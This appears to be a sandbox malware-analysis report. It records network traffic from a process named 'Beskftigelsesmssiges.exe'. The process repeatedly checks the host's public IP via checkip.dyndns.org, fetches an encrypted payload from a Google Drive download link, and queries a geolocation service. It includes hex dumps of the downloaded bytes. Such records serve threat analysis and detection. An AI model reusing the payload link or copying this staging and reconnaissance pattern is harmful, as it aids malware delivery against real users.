                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  4192.168.2.449802132.226.8.169807852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 2, 2024 16:15:23.938836098 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Dec 2, 2024 16:15:25.412378073 CET273INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:25 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  5192.168.2.449813132.226.8.169807852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 2, 2024 16:15:27.322514057 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Dec 2, 2024 16:15:29.767723083 CET273INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:29 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  6192.168.2.449822132.226.8.169807852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 2, 2024 16:15:31.848694086 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Dec 2, 2024 16:15:33.322443008 CET273INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:33 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  7192.168.2.449829132.226.8.169807852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  Dec 2, 2024 16:15:35.268507004 CET151OUTGET / HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Dec 2, 2024 16:15:36.781102896 CET273INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:15:36 GMT
                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  0192.168.2.449736172.217.19.1744437852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-02 15:14:54 UTC216OUTGET /uc?export=download&id=1xd9Aulm45fNbhuAM5L24KkyqjHMxxd5C HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                  Host: drive.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2024-12-02 15:14:55 UTC1920INHTTP/1.1 303 See Other
                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:14:54 GMT
                                                                                                                                                                                  Location: https://drive.usercontent.google.com/download?id=1xd9Aulm45fNbhuAM5L24KkyqjHMxxd5C&export=download
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy: script-src 'nonce-mXZBrVyeVh2-BaK0N_eZBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                  Connection: close


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  1192.168.2.449737142.250.181.1294437852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-02 15:14:57 UTC258OUTGET /download?id=1xd9Aulm45fNbhuAM5L24KkyqjHMxxd5C&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  Host: drive.usercontent.google.com
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-02 15:15:00 UTC4922INHTTP/1.1 200 OK
                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                  Content-Security-Policy: default-src 'none'
                                                                                                                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Content-Disposition: attachment; filename="mfKPHMLsurFUxt31.bin"
                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Content-Length: 277056
                                                                                                                                                                                  Last-Modified: Mon, 02 Dec 2024 10:39:38 GMT
                                                                                                                                                                                  X-GUploader-UploadID: AFiumC5wWJhJqsi7uneTxV_dcPYzaU3uUui8PgMfWO0s_8bAizJGTeVZRxgwwqMJapjlUlGCFT6DugyAvQ
                                                                                                                                                                                  Date: Mon, 02 Dec 2024 15:14:59 GMT
                                                                                                                                                                                  Expires: Mon, 02 Dec 2024 15:14:59 GMT
                                                                                                                                                                                  Cache-Control: private, max-age=0
                                                                                                                                                                                  X-Goog-Hash: crc32c=zAsH4Q==
                                                                                                                                                                                  Server: UploadServer
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  2024-12-02 15:15:00 UTC4922INData Raw: f7 fa c0 e1 8f 28 8a 40 88 40 8e 93 b1 61 2d 20 3c 59 01 2f 1e d6 a2 f8 07 ba a2 db 4b 87 d4 09 a1 bc 5e 42 65 95 19 96 d0 ec 56 4e 57 ab af f8 57 a0 82 d1 f4 b4 09 c5 2a 90 2b d2 68 67 f0 46 f9 7a 23 b4 8b 4c 79 01 fe 55 c1 4f 2a e2 f2 de a3 97 52 19 f6 38 82 cd 81 45 6c 0e c0 46 b0 91 ac b7 ee ff 5c 1a 50 89 2d df 50 82 ab 75 72 84 fc ba bb b3 d9 65 27 50 6f c7 3c 3f a4 bd 5c 94 80 47 51 3b 16 ef e8 bd 00 56 7e 56 40 39 ac 53 66 74 a7 3d f0 1c 3b e3 b1 f4 c7 5b 25 da d5 92 60 c7 f0 45 63 ff 5b 3c 3c 36 85 df 98 7b cf 84 94 5e 3d b8 93 84 80 34 d0 c8 cc 1f b2 73 b1 33 76 5a 77 c1 c2 b8 bb 6f 54 d7 66 49 1e ad 42 47 f6 72 25 f5 7d 85 44 61 31 46 5c 95 67 35 bb ce 55 60 14 c7 49 2c 32 5a 7d 01 a2 9c d5 30 06 c2 ea 1f d8 42 31 64 6c 79 dd 1b 45 25 54 58 99
                                                                                                                                                                                  Data Ascii: (@@a- <Y/K^BeVNWW*+hgFz#LyUO*R8ElF\P-Pure'Po<?\GQ;V~V@9Sft=;[%`Ec[<<6{^=4s3vZwoTfIBGr%}Da1F\g5U`I,2Z}0B1dlyE%TX
                                                                                                                                                                                  2024-12-02 15:15:00 UTC4853INData Raw: 57 cd 1e c4 b5 92 b5 11 4b 59 47 1c 3d b8 a5 cf 24 19 ca 8b 47 42 c6 7d 25 14 8d 72 1b 38 4e 69 d6 f9 08 42 43 e5 b5 27 c0 d7 d6 bd c0 08 01 16 13 36 95 36 ff fd 24 65 1a 11 df 46 d7 a4 5c 8c cd 49 eb 25 ae 7a 21 a6 15 79 83 d5 e6 7c 3f d7 72 03 60 d6 a8 ab 79 6d b4 cc 3b 26 f9 e2 76 f9 0a 62 55 cd b9 4b 77 87 29 08 86 6b 9c 8d 73 85 f4 c2 cc 9e 72 2b 6f b6 36 e0 e3 22 72 f3 0b 35 ac c5 99 79 3a e1 e2 e9 36 8a 5e 5a d5 49 56 11 8c bb ec 17 26 40 70 37 f7 46 40 19 12 f9 9e 39 16 1a 4b 23 e3 a5 ae 36 75 73 ad b9 28 2b 87 bf 02 68 db 64 2d 2b 11 b7 2c 59 8f 71 6c ae d4 e2 9a da d4 3f b5 60 40 69 32 da cb b0 d8 ef dc 23 66 f6 80 33 7e 20 e1 05 16 ec eb 84 ff ec ad 9f c7 08 58 9b ae b8 b5 ff eb 60 b3 4c 5c 24 72 2d 60 81 ac 0e 1a 4f 30 de a0 c7 22 17 fe 3e 04
                                                                                                                                                                                  Data Ascii: WKYG=$GB}%r8NiBC'66$eF\I%z!y|?r`ym;&vbUKw)ksr+o6"r5y:6^ZIV&@p7F@9K#6us(+hd-+,Yql?`@i2#f3~ X`L\$r-`O0">
                                                                                                                                                                                  2024-12-02 15:15:00 UTC1324INData Raw: e2 74 5e a1 28 3f a2 66 64 53 38 76 ff 00 aa 9e 6c f3 4a 29 92 45 06 b0 a4 08 f9 b4 d8 0e 53 09 9b 7f 88 89 7c 40 40 f0 f6 ba c2 ca 35 2c 9f 8c 47 cf ac a9 a6 18 4b 90 32 a5 71 62 6c 22 08 a7 7c e5 3c 8d 62 8d 3b 9f c8 f5 67 21 f4 95 ef bf 3d 33 75 20 b3 be 88 3f bb 01 fa 5f d2 47 c4 15 8c e4 1b 97 56 6a 35 38 82 c7 ae 81 6c 0e ca 46 a1 99 c3 72 ee ff 56 64 6d 89 2d db 3f 44 ab 75 78 84 ed b2 c9 66 d6 65 57 78 db c7 3c 35 56 56 53 94 fe 70 b0 35 16 51 8e b7 21 ee 75 1a 9c 10 e5 b6 4f 07 87 4c a7 65 2e 3e de 99 97 9a 61 a3 93 49 14 e7 98 82 66 95 5c 9b 12 5f 9b 5d f9 2d e2 9c f9 31 5d 7f 98 93 ff d3 fa c8 bc bd 97 68 cf 19 26 1f 73 63 ab a5 ca 94 83 52 86 8d 36 d8 42 47 fc 1d ed f5 9d 8f 46 1e 06 47 0c 91 14 d8 bf ce 5f 67 1d b9 78 2c 32 5e a1 20 a4 9c a5
                                                                                                                                                                                  Data Ascii: t^(?fdS8vlJ)ES|@@5,GK2qbl"|<b;g!=3u ?_GVj58lFrVdm-?DuxfeWx<5VVSp5Q!uOLe.>aIf\_]-1]h&scR6BGFG_gx,2^
                                                                                                                                                                                  2024-12-02 15:15:00 UTC1390INData Raw: 4d 26 83 51 b9 37 d3 13 e1 fe 5d 65 8b be d9 4f c4 b6 5b d5 b5 4f 48 46 32 dd fe 49 e6 c9 49 fe de a1 f7 bd 2f bd ab cd b6 0c 58 a6 93 fa d4 69 63 80 b3 0a 87 e0 45 d7 a1 75 99 a3 90 2c 7a 95 16 b3 cc 1f 43 a6 e7 f3 82 72 1c f2 5b 4c ab 85 c3 81 71 4c e7 38 76 8b 90 8f 86 1a 48 27 2b e2 97 35 81 5b 30 f9 be ca 52 77 00 ef 45 8d b0 cf e0 68 85 88 95 c8 d9 13 48 86 f8 47 bf b0 81 07 18 47 9a 24 73 07 71 6b 39 0f 9e 32 db 3c 8d 66 88 e4 eb a8 e7 67 57 f9 4a ef bf 33 33 fd 20 b3 be 99 6e 07 41 fa 55 c5 67 eb 1d f2 d8 1b 49 42 3c de 0c 82 cd cb 56 4f 0e e8 24 b0 91 a6 69 ee ff 5c 1a 2e be 2d df 54 f0 c8 77 72 f4 ea 92 3a b3 d9 6f 31 ae 6e d4 18 2e 00 91 00 89 03 18 eb 35 17 7e f7 02 8e e0 7f 6a 2f 3d ef 13 bb 07 87 47 20 56 44 e3 19 97 e7 48 e6 91 a2 83 2c e7
                                                                                                                                                                                  Data Ascii: M&Q7]eO[OHF2II/XicEu,zCr[LqL8vH'+5[0RwEhHGG$sqk92<fgWJ33 nAUgIB<VO$i\.-Twr:o1n.5~j/=G VDH,
                                                                                                                                                                                  2024-12-02 15:15:00 UTC1390INData Raw: 3e 0f b2 6a dc cb c4 6e 44 51 3b e4 5f b9 4d 71 48 dd d6 e9 61 f8 59 7b 6a d6 d7 95 ca b3 50 3b 63 2b a9 d7 4e 89 1e eb db ce d3 64 8f 2f cd 0d 9b 64 72 72 ac 80 f6 08 7d 7f f2 4c 76 e4 92 e7 8f c2 5d 18 a9 ff 7a 6c 6b 1d b3 e4 15 c7 ca eb e2 8b 40 65 4a 74 5e a1 f5 61 8f 6d 64 42 30 60 ee f8 aa 9e 62 81 29 3a 9a 4b 2e 98 25 0c d1 75 ce f0 58 75 51 6e 8e ba bf 53 48 8e b2 95 c2 ce 4f 65 ae 8e 43 cc 06 81 27 12 24 57 24 5b 7a 71 7a 3b 1e 98 23 2a 3c 8d 68 99 d4 9f 9a 3a 67 27 8d 55 c7 db 37 1b b2 20 6d a4 ad 64 4d 01 fa 5f d2 45 d5 35 90 de 1b 9d 8c 19 f6 38 82 b3 f4 45 6c 0a b2 25 b2 91 dc a1 c6 7e 5c 1a 5a 9f d3 de 43 89 ba 7e 4b 4f fd ba bb cd f2 65 27 54 47 2c 3c 3f 2e ae 50 ea b8 58 eb 31 64 36 f1 70 51 f8 57 9b 8d 18 f2 2d f1 06 94 40 93 7e 65 48 d0
                                                                                                                                                                                  Data Ascii: >jnDQ;_MqHaY{jP;c+Nd/drr}Lv]zlk@eJt^amdB0`b):K.%uXuQnSHOeC'$W$[zqz;#*<h:g'U7 mdM_E58El%~\ZC~KOe'TG,<?.PX1d6pQW-@~eH
                                                                                                                                                                                  2024-12-02 15:15:00 UTC1390INData Raw: e5 80 89 84 00 b6 f1 2f 08 11 37 33 1a 7e e9 a7 90 47 51 52 15 fd be 47 71 48 c5 d6 e9 61 f9 d7 79 6a ac d2 ba 5a b5 3f e0 75 d5 a2 cd 4e df e9 ea db c4 c7 ca e6 2f cd 08 c0 80 72 72 ac e1 73 79 4c 0f e5 c5 07 87 90 e6 da c2 0b dd a9 ff 74 52 91 1c a0 eb 6b 77 e6 e7 f9 f1 34 1e 80 04 76 f0 f5 61 ae 18 2f 53 38 72 a9 78 aa 9e 62 ff 36 2b 92 31 38 d2 25 08 f3 1c da e4 46 32 27 6e 8e ba cb c1 40 f0 89 99 c2 c2 43 95 a1 8e 37 d0 01 81 27 12 4b 92 5a 19 70 71 6f 4d 4c 9e 4c e0 4f 31 62 99 cf f6 48 f5 67 2d 87 7d b5 bf 37 11 a9 ad f3 b4 88 4d 5c 17 88 02 d5 4f a5 bf d7 c9 33 23 52 19 fc 9a a7 d5 b3 8c 62 0e b0 e4 95 88 d2 8f ee ff 58 b8 75 93 5f 32 5e 82 db d7 57 9f 82 a6 bb b3 dd 0a c9 50 6f cd 9e 1a 38 cf df 87 8e 28 49 1d 63 5b e1 7a 4e b2 7f 1a 87 15 f0 32
                                                                                                                                                                                  Data Ascii: /73~GQRGqHayjZ?uN/rrsyLtRkw4va/S8rxb6+18%F2'n@C7'KZpqoMLLO1bHg-}7M\O3#RbXu_2^WPo8(Ic[zN2
                                                                                                                                                                                  2024-12-02 15:15:00 UTC1390INData Raw: 22 fb 8c b2 3d fd 8b 5c 9e a1 80 89 84 72 fd eb 40 a3 07 1f b8 1a 7e db 72 6e 44 5b 54 2c 49 91 31 71 36 fc d6 c9 65 87 b4 7b 42 ab c4 92 d1 b5 23 67 23 2b a3 c7 6c f0 bf e3 d0 c4 a3 32 f2 2f cd 0f 4a 88 65 0c e3 93 fe 72 ee 5a ea 3a 23 96 90 97 d7 94 75 99 af 5d 55 63 eb 5a a0 ed 00 6c c3 fd 81 d0 46 0a f0 d6 7b b0 ee ec e4 66 64 52 1d 60 f3 e7 a5 9e 18 23 0c 3c ba 81 10 98 2f aa dc a6 bc 3d 46 1a ed cc ab a9 97 f6 40 f0 82 37 e7 d0 43 f1 bf 8e 37 1d 92 f4 27 18 41 38 0c 2e 70 71 61 20 11 ec 59 f1 3c fd 1c 86 c5 99 f1 dd 2e 27 87 5f 9d bc 25 1b c4 08 f1 b4 88 4a 68 1f eb 41 e9 0b d5 1d f4 de c6 16 53 19 f6 1d aa f9 c1 45 66 1d df 46 98 f3 ac b7 e4 21 5c 1a 50 89 2d a1 64 82 ab 71 00 e7 fe ba cb a5 f1 e4 27 50 65 d1 c2 3e 37 9d 4d b4 b7 8b eb 35 16 73 bb
                                                                                                                                                                                  Data Ascii: "=\r@~rnD[T,I1q6e{B#g#+l2/JerZ:#u]UcZlF{fdR`#</=F@7C7'A8.pqa Y<.'_%JhASEfF!\P-dq'Pe>7M5s
                                                                                                                                                                                  2024-12-02 15:15:00 UTC1390INData Raw: 49 35 3f 80 53 b9 8d 49 62 93 43 a9 9a 03 fd 9a 4c e2 0f 80 a1 ec 72 ec fa f2 1b 01 1f b2 1a 7e e3 cf 5c 44 5b 50 5e 3c bb 47 01 20 de 57 e9 65 81 a2 85 6b cf c1 83 de 8c f5 e8 63 2b dd e9 49 e6 c9 99 ea c6 d3 6a a5 07 4c 09 e8 a7 64 8c a7 80 f8 67 4a 46 c2 49 04 87 90 f3 01 d2 48 99 a9 f9 03 ba 95 1c aa c5 c5 ce e6 ed f3 f0 95 0a 80 7e 4d ac e4 66 da 5c 64 53 3c 05 42 32 aa 94 07 45 29 2b 98 35 01 9f 4a cd f9 be c4 8e 6f 1a 9d 6a e1 76 bf 42 4a f0 99 92 b0 1f 3e 5e de a6 f3 bf ba 8b 55 f3 44 9a 54 73 2b 71 6b 39 60 59 4c e4 36 8d 73 9e d8 14 b5 f5 67 26 a2 43 9d c8 22 1b c4 82 96 a3 a0 f8 79 01 f0 f7 e4 57 a7 d4 fc de 6b 35 77 00 88 00 82 cd c5 e7 49 14 b2 6d b3 91 dc 15 cb e4 22 3a 50 89 29 7d 75 9e d9 f6 67 84 8c 18 93 c6 d9 65 2d 3f a7 c7 3c 35 24 c3
                                                                                                                                                                                  Data Ascii: I5?SIbCLr~\D[P^<G Wekc+IjLdgJFIH~Mf\dS<B2E)+5JojvBJ>^UDTs+qk9`YL6sg&C"yWk5wIm":P)}uge-?<5$
                                                                                                                                                                                  2024-12-02 15:15:00 UTC1390INData Raw: 6b 94 46 d1 a4 ef c1 08 b4 6b 20 22 02 46 b9 f7 eb 96 38 50 8c b8 58 a1 9a 46 fb 18 a2 92 03 32 ec f0 2e 5d 11 6d 27 0c 7e 93 13 4b 53 73 e0 2c 5f b3 e5 54 2e 84 1f e7 65 fb 16 5e 73 a2 fc 92 db b1 9d cf 79 59 88 c5 49 96 6f c3 ae c4 d3 10 a0 0c db 21 9e ad 72 78 a6 b3 fe 7a 4c 7f da 3f 04 87 9a e7 ff aa 4a 99 a9 fb 61 58 e7 a9 b6 ed 74 b0 f9 e7 f3 87 7f 43 80 74 54 ba d6 1f e4 66 64 57 10 48 81 32 ac 9e b6 91 0c 03 a6 35 10 92 36 2c f9 96 ac f0 52 10 43 6e 8e b0 bf 3c 77 f0 88 91 b0 a9 33 5e de 98 6f 3e ba 81 2d 0e b5 9b 37 7e 61 54 47 6f 12 13 0c e4 3c 8c 47 8f b7 ee e0 f5 17 85 a2 42 c7 0b 37 1b be 82 96 ac fa 85 77 01 8a f7 e4 56 ab 25 f2 de 1f 35 77 03 84 13 81 cd b1 e7 49 15 be 66 b0 91 a8 15 cb e3 2e 99 45 89 5d 7d 78 f7 ab 75 78 97 da c4 fa b3 d9
                                                                                                                                                                                  Data Ascii: kFk "F8PXF2.]m'~KSs,_T.e^syYIo!rxzL?JaXtCtTfdWH256,RCn<w3^o>-7~aTGo<GB7wV%5wIf.E]}xux
                                                                                                                                                                                  2024-12-02 15:15:00 UTC1390INData Raw: 11 42 67 e7 0a 6e 58 6c 79 03 b1 5d a5 84 ef ea 07 16 5f 2d 46 ee 99 b9 87 43 be 4d 41 9d cc 09 fd 9a 42 d9 c0 80 89 84 1d 20 f0 2f 72 07 0e a3 64 44 e3 b1 6a 3a 60 54 2c 5b ca fb 71 36 fc b9 24 65 8b be 7b 7b cd d5 9e b4 7b 3f ea 69 2b b2 ca 26 29 cd eb d1 c4 0d 0a 96 07 f9 09 e8 a7 61 61 a6 bb 9c 76 4c 75 2c 48 04 87 90 e7 ff aa 40 99 a9 fb 02 19 97 1c d0 fb 2c 4f e6 e7 f9 95 a9 0b 93 60 4f bf cc 9a a5 66 64 4e b5 36 81 32 ab bb 7e f3 5e 3e 92 45 b2 bd 32 20 4d be ce fa f0 3f 85 1c 47 be bf 32 e2 d5 91 eb fa ca 31 5a 0c ab 5d cd 91 82 27 68 e9 bf 3f 25 50 71 6b 37 ad bb 50 96 bf 98 62 e9 67 b1 80 f5 67 2d 94 40 91 89 37 1b b0 52 de a4 88 3c 6f 29 7b 55 c1 45 c3 e3 f3 cd 0d 86 44 20 20 38 82 cd d7 6d 1a 0e c0 4c b0 b1 ac bb ee ff 74 6d 50 89 27 df 41 97
                                                                                                                                                                                  Data Ascii: BgnXly]_-FCMAB /rdDj:`T,[q6$e{{{?i+&)aavLu,H@,O`OfdN62~^>E2 M?G21Z]'h?%Pqk7Pbgg-@7R<o){UED 8mLtmP'A


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  2192.168.2.449766172.67.177.1344437852C:\Users\user\AppData\Local\Temp\Beskftigelsesmssiges.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-02 15:15:10 UTC85OUTGET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  Connection: Keep-Alive
